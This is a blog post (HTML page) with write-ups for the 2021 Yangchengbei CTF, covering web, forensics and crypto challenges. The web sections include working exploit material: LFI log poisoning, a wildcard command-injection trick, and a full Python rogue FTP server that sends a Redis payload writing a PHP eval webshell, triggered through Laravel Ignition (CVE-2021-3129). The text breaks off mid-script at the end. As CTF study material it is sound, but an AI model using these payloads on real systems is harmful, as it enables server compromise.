<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.getflag.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="记录一下">
<meta property="og:type" content="article">
<meta property="og:title" content="羊城杯 2021">
<meta property="og:url" content="https://www.getflag.cn/2021/10/02/%E7%BE%8A%E5%9F%8E%E6%9D%AF/index.html">
<meta property="og:site_name" content="kawhi&#39;s Blog">
<meta property="og:description" content="记录一下">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210920185002704.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911215822797.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911220240845.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911220633558.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911221015226.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911221916313.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911222315660.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911225240971.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911230335289.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911230425844.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912112009462.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912112845249.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912112450869.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912113034468.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912113402176.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912113803487.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912105411009.png">
<meta property="article:published_time" content="2021-10-01T16:00:00.000Z">
<meta property="article:modified_time" content="2021-10-02T14:00:08.445Z">
<meta property="article:author" content="kawhi">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210920185002704.png">

<link rel="canonical" href="https://www.getflag.cn/2021/10/02/%E7%BE%8A%E5%9F%8E%E6%9D%AF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>羊城杯 2021 | kawhi's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">kawhi's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">今天也没什么干劲</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fab fa-pagelines fa-fw"></i>友链</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.getflag.cn/2021/10/02/%E7%BE%8A%E5%9F%8E%E6%9D%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
      <meta itemprop="name" content="kawhi">
      <meta itemprop="description" content="随笔、分享、记录生活">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="kawhi's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          羊城杯 2021
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-10-02 00:00:00 / 修改时间：22:00:08" itemprop="dateCreated datePublished" datetime="2021-10-02T00:00:00+08:00">2021-10-02</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF%E6%AF%94%E8%B5%9B/" itemprop="url" rel="index"><span itemprop="name">CTF比赛</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>7.1k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>6 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>记录一下<a id="more"></a></p>
<h2 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h2><p>看图猜数字，<code>28</code>定律，八卦，<code>30</code>而立，北斗七星，四大才子等猜出全部图片对应的数字如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">28-08-30-07-04-20-02-17-23-01-12-19</span><br></pre></td></tr></table></figure>

<p>然后再<code>md5</code>加密一下就好了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Sangfor&#123;d93b7da38d89c19f481e710ef1b3558b&#125;</span><br></pre></td></tr></table></figure>

<h2 id="only-4"><a href="#only-4" class="headerlink" title="only 4"></a>only 4</h2><p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="string">&#x27;index.php&#x27;</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">$gwht= $_GET[<span class="string">&quot;gwht&quot;</span>];</span><br><span class="line">$ycb= $_GET[<span class="string">&quot;ycb&quot;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/flag/&quot;</span>,$gwht))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;hack&#x27;</span> );</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/secret/&quot;</span>,$gwht))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;hack&#x27;</span> );</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">include</span>($gwht);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($ycb))&#123;</span><br><span class="line">    $url = parse_url($_SERVER[<span class="string">&#x27;REQUEST_URI&#x27;</span>]);</span><br><span class="line">    parse_str($url[<span class="string">&#x27;query&#x27;</span>],$query);</span><br><span class="line">    <span class="keyword">foreach</span>($query <span class="keyword">as</span> $value)&#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">&quot;/Flag/&quot;</span>,$value)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;not hit&#x27;</span>);</span><br><span class="line">            <span class="keyword">exit</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $YCB = unserialize($ycb);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;what are you doing&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="预期解"><a href="#预期解" class="headerlink" title="预期解"></a>预期解</h3><p>用伪协议读一下<code>serialize.php</code>，再构造反序列化链，可以读取<code>secret.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(strlen($_GET[<span class="string">&#x27;SXF&#x27;</span>])&lt;<span class="number">5</span>)&#123;</span><br><span class="line">  <span class="keyword">echo</span> shell_exec($_GET[<span class="string">&#x27;SXF&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先通过<code>&gt;cat</code>，在目标目录下写入<code>cat</code>文件，然后用通配符执行即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">secret.php?SXF&#x3D;*  &#x2F;*</span><br></pre></td></tr></table></figure>

<h3 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>非预期</h3><p>首先直接包含<code>/proc/self/cmdline</code>发现是<code>apache</code>的服务器</p>
<p><code>/proc/pid/fd</code> ：是个目录，包含当前进程打开的每一个文件的文件描述符（<code>file descriptor</code>），这些文件描述符是指向实际文件的一个符号链接</p>
<p>这里可以用遍历<code>/proc/self/fd</code>来发现<code>error</code>日志和<code>access</code>日志</p>
<p>尝试发现<code>/proc/self/fd/8</code>为<code>access</code>日志，修改<code>ua</code>头为<code>php</code>代码，包含<code>access</code>日志，成功解析</p>
<p>或者直接包含<code>/var/www/example.com/log/access.log</code></p>
<h2 id="Cross-The-Side"><a href="#Cross-The-Side" class="headerlink" title="Cross The Side"></a>Cross The Side</h2><p>题目是<code>Laravel v8.26.1</code>，用<code>CVE-2021-3129</code>的伪协议的方法打发现打不动</p>
<p>利用<code>ftp</code> 被动模式攻击<code>fastcgi</code>去打<code>redis</code></p>
<p>用<code>gopherus</code>生成一个<code>payload</code></p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210920185002704.png" alt="image-20210920185002704"></p>
<p><code>ftp</code>被动服务</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> unquote</span><br><span class="line"><span class="comment"># 对gopherus生成的payload进行一次urldecode</span></span><br><span class="line">payload = unquote(<span class="string">&quot;%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20%40eval%28%24_GET%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A&quot;</span>)</span><br><span class="line">payload = payload.encode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">host = <span class="string">&#x27;0.0.0.0&#x27;</span></span><br><span class="line">port = <span class="number">23</span></span><br><span class="line">sk = socket.socket()</span><br><span class="line">sk.bind((host, port))</span><br><span class="line">sk.listen(<span class="number">5</span>)</span><br><span class="line"><span class="comment"># ftp被动模式的passvie port,监听到1234</span></span><br><span class="line">sk2 = socket.socket()</span><br><span class="line">sk2.bind((host, <span class="number">1234</span>))</span><br><span class="line">sk2.listen()</span><br><span class="line"><span class="comment"># 计数器，用于区分是第几次ftp连接</span></span><br><span class="line">count = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">    conn, address = sk.accept()</span><br><span class="line">    conn.send(<span class="string">b&quot;200 \n&quot;</span>)</span><br><span class="line">    print(conn.recv(<span class="number">20</span>))  <span class="comment"># USER aaa\r\n  客户端传来用户名</span></span><br><span class="line">    <span class="keyword">if</span> count == <span class="number">1</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;220 ready\n&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;200 ready\n&quot;</span>)</span><br><span class="line">    print(conn.recv(<span class="number">20</span>))   <span class="comment"># TYPE I\r\n  客户端告诉服务端以什么格式传输数据，TYPE I表示二进制， TYPE A表示文本</span></span><br><span class="line">    <span class="keyword">if</span> count == <span class="number">1</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;215 \n&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;200 \n&quot;</span>)</span><br><span class="line">    print(conn.recv(<span class="number">20</span>))  <span class="comment"># SIZE /123\r\n  客户端询问文件/123的大小</span></span><br><span class="line">    <span class="keyword">if</span> count == <span class="number">1</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;213 3 \n&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;300 \n&quot;</span>)</span><br><span class="line">    print(conn.recv(<span class="number">20</span>))  <span class="comment"># EPSV\r\n&#x27;</span></span><br><span class="line">    conn.send(<span class="string">b&quot;200 \n&quot;</span>)</span><br><span class="line">    print(conn.recv(<span class="number">20</span>))   <span class="comment"># PASV\r\n  客户端告诉服务端进入被动连接模式</span></span><br><span class="line">    <span class="keyword">if</span> count == <span class="number">1</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;227 x,x,x,x,0,1234\n&quot;</span>)  <span class="comment"># 服务端告诉客户端需要到哪个ip:port去获取数据,ip,port都是用逗号隔开，其中端口的计算规则为：4*256+210=1234</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;227 127,0,0,1,0,6379\n&quot;</span>)  <span class="comment"># 端口计算规则：24*256+235=9000</span></span><br><span class="line">    print(conn.recv(<span class="number">20</span>))  <span class="comment"># 第一次连接会收到命令RETR /123\r\n，第二次连接会收到STOR /123\r\n</span></span><br><span class="line">    <span class="keyword">if</span> count == <span class="number">1</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;125 \n&quot;</span>) <span class="comment"># 告诉客户端可以开始数据链接了</span></span><br><span class="line">        <span class="comment"># 新建一个socket给服务端返回我们的payload</span></span><br><span class="line">        print(<span class="string">&quot;建立连接!&quot;</span>)</span><br><span class="line">        conn2, address2 = sk2.accept()</span><br><span class="line">        conn2.send(payload)</span><br><span class="line">        conn2.close()</span><br><span class="line">        print(<span class="string">&quot;断开连接!&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;150 \n&quot;</span>)</span><br><span class="line">        print(conn.recv(<span class="number">20</span>))</span><br><span class="line">        exit()</span><br><span class="line">    <span class="comment"># 第一次连接是下载文件，需要告诉客户端下载已经结束</span></span><br><span class="line">    <span class="keyword">if</span> count == <span class="number">1</span>:</span><br><span class="line">        conn.send(<span class="string">b&quot;226 \n&quot;</span>)</span><br><span class="line">    conn.close()</span><br><span class="line">    count += <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>然后发送请求</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;_ignition&#x2F;execute-solution HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.41.107:8077</span><br><span class="line">Content-Type: application&#x2F;json</span><br><span class="line">Content-Length: 190</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  &quot;solution&quot;: &quot;Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution&quot;,</span><br><span class="line">  &quot;parameters&quot;: &#123;</span><br><span class="line">    &quot;variableName&quot;: &quot;username&quot;,</span><br><span class="line">    &quot;viewFile&quot;: &quot;ftp:&#x2F;&#x2F;aaa@x.x.x.x:23&#x2F;123&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>写进<code>shell</code>后，读取<code>flag</code>即可</p>
<h2 id="Baby–forenisc"><a href="#Baby–forenisc" class="headerlink" title="Baby–forenisc"></a>Baby–forenisc</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">volatility.exe -f 1.raw --profile&#x3D;WinXPSP2x86  cmdscan</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911215822797.png" alt="image-20210911215822797"></p>
<p>用<code>volatility.exe</code>取证<code>cmdscan</code>发现</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Cmd #0 @ 0x3689ed8: git push -u origin master</span><br><span class="line">Cmd #1 @ 0x566148: ok....</span><br><span class="line">Cmd #2 @ 0x56aa08: then delete .git and flagfile</span><br><span class="line">Cmd #3 @ 0x368a798: You can never find my account</span><br><span class="line">Cmd #4 @ 0x56a580: hahaha!</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">volatility.exe -f 1.raw --profile&#x3D;WinXPSP2x86 filescan | grep -E &#39;txt&#39;</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911220240845.png" alt="image-20210911220240845"></p>
<p>在桌面发现<code>ssh.txt</code>文件，打开发现是一个私钥文件</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911220633558.png" alt="image-20210911220633558"></p>
<p>用<code>PuTTY</code>分析下发现一个邮箱地址</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911221015226.png" alt="image-20210911221015226"></p>
<p>然后在<code>github</code>找到这个用户</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911221916313.png" alt="image-20210911221916313"></p>
<p>美化格式之后发现</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911222315660.png" alt="image-20210911222315660"></p>
<p><code>base64</code>解密之后<code>SangFor&#123;S0_3azy_2_crack_noob_player&#125;</code></p>
<h2 id="赛博德国人"><a href="#赛博德国人" class="headerlink" title="赛博德国人"></a>赛博德国人</h2><p>流量分析</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911225240971.png" alt="image-20210911225240971"></p>
<p>发现<code>FTP</code>协议这里有个<code>pdf</code>文件还有个<code>txt</code>文件，导出下发现，<code>pdf</code>存在密码</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911230335289.png" alt="image-20210911230335289"></p>
<p>用<code>ftp</code>的密码即可解压</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210911230425844.png" alt="image-20210911230425844"></p>
<p><code>encrypyed.txt</code>文件内容如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0911 &#x3D; 1tle &#x3D; 1tl &#x3D; 350 &#x3D; RZS NAJ &#x3D;</span><br><span class="line">nkfgp roqad boprv yrdhy zwamf qsrhb owqvt jzotr ffcjq snpqh kpwzm fprru gufez xsuws aohyw xbreu pifbz kagxj blbha jzixj zrasn zxkay lpaza ejwou itcip dfdgp rbjnv xuqzq qhtya xwwik wyybx kdgrc slrkj pgjay aidwa jeszp pbqat njojg jrplb kkhot joqpg vwecj soabm aupsr fenug ybxmr jloch kmjgc tznxl tnrqx pbeph fwymn gpoor pjkkb plkwb kxzeq quorp ipuvs utyae qyzgp mqnai iysse gzsht tsrmv crrkr opuxj tqshv ypdrw rvnzt cstlj</span><br></pre></td></tr></table></figure>

<p>是德国二战的时候的一个密码机器叫恩尼玛密码机，然后下载一个模拟器</p>
<img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912112009462.png" alt="image-20210912112009462" style="zoom:25%;" />

<p>这里首先要模拟根据天数转子信息，找了一个<code>demo</code>，比如<code>Walzenlage</code>为齿轮号，在机器的后面进行设置</p>
<img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912112845249.png" alt="image-20210912112845249" style="zoom:25%;" />

<p><code>Ringstellung</code>是对应齿轮号的号码，然后连接接线板，接线板信息根据<code>Steckerverbindungen</code>来设置</p>
<img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912112450869.png" alt="image-20210912112450869" style="zoom:25%;" />

<p>然后设置转子的启动位置<code>RZS</code>，然后敲入检索起始信息<code>NAJ</code>，将检索起始信息解密出来的密码作为转子的启动位置，在下面这里设置转子的起始位置，设置好之后</p>
<img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912113034468.png" alt="image-20210912113034468" style="zoom:25%;" />

<p>然后输入解密的内容，现在解密实际的消息，但要确保跳过密钥标识组<code>nkfgp</code>，然后<code>start</code></p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912113402176.png" alt="image-20210912113402176"></p>
<p>然后将得到的密码，根据德国数字转阿拉伯数字</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">VIERSIEBENFUENFSIEBENVIERACHTFUENFVIERSIEBENBERTADREISECHSSECHSZWEIDREINEUNDREISECHSDREISIEBENDREIZWEIDREINULLDREIFUENFSECHSSECHSSECHSFUENFDREISIEBENDREIFUENFDREISIEBENDREINEUNDREIFUENFSECHSSECHSDREIEINSDREINULLDREIVIERDREIACHTDREIFUENFDREISIEBENDREIEINSSECHSDREISECHSSECHSDREIVIERSECHSDREISECHSSECHSSECHSZWEIDREISIEBENDREINULLDREIDREISIEBENDORA</span><br></pre></td></tr></table></figure>

<p>然后转一下<code>hex</code>即可或者到<code>flag</code></p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210912113803487.png" alt="image-20210912113803487"></p>
<h2 id="misc520"><a href="#misc520" class="headerlink" title="misc520"></a>misc520</h2><p>先用脚本循环解压下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> zipfile</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">a = <span class="number">519</span></span><br><span class="line">passwd = <span class="string">b&#x27;0573&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">519</span>):</span><br><span class="line">    old_name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    name = str(a)+<span class="string">&#x27;.zip&#x27;</span></span><br><span class="line">    a = a<span class="number">-1</span></span><br><span class="line">    <span class="keyword">with</span> zipfile.ZipFile(name) <span class="keyword">as</span> zFile:</span><br><span class="line">        zFile.extractall(path=<span class="string">&#x27;./&#x27;</span>)</span><br><span class="line">        old_name = name</span><br><span class="line">        name = zFile.filelist[<span class="number">0</span>].filename</span><br><span class="line">        <span class="keyword">if</span> name[<span class="number">-3</span>:<span class="number">-1</span>] != <span 